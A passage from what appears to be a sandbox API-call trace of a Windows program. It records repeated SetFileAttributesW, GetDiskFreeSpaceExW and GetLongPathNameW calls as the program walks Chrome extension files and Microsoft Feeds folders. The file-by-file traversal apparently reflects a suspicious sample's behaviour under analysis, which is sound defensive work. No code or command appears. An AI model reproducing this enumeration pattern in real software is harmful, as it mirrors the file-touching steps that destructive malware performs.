Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html", dwFileAttributes=0x80) returned 1 [0141.283] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.289] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png", dwFileAttributes=0x80) returned 1 [0141.291] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.295] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html", dwFileAttributes=0x80) returned 1 [0141.298] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.303] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html", dwFileAttributes=0x80) returned 1 [0141.306] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.311] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html", dwFileAttributes=0x80) returned 1 [0141.314] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.318] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html", dwFileAttributes=0x80) returned 1 [0141.321] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.327] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html", dwFileAttributes=0x80) returned 1 [0141.387] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x4d [0141.387] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x4c [0141.388] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec38, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x4c [0141.389] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec38, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x4c [0141.390] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x4c [0141.391] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x4c [0141.391] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebe8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x4d [0141.392] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x4d [0141.393] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x4d [0141.399] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x4d [0141.399] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 0x67 [0141.400] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 0x67 [0141.401] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x4d [0141.402] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 0x67 [0141.403] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 0x67 [0141.404] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x4d [0141.404] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 0x60 [0141.405] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 0x60 [0141.406] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x4c [0141.406] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 0x4c [0141.407] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebe8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x4d [0141.408] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x4d [0141.408] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\") returned 0x4d [0141.411] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.411] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x63 [0141.412] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec38, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x63 [0141.413] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec38, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x63 [0141.414] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x63 [0141.415] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x63 [0141.415] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebe8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.416] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.417] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.419] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x63 [0141.419] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpszLongPath=0x2aec08, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 0x63 [0141.420] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebe8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.421] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.421] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebdc, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.424] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.425] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x6f [0141.426] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x6e [0141.426] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebf0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.427] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebf0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x6e [0141.428] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebf0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x6e [0141.429] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.431] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x6e [0141.431] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x6e [0141.432] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aeba0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.433] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeba0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x6f [0141.433] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.434] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x6f [0141.435] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x6f [0141.440] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.440] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x6f [0141.441] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms") returned 0x87 [0141.442] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Suggested Sites~.feed-ms") returned 0x87 [0141.443] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x64 [0141.443] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeb78, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS 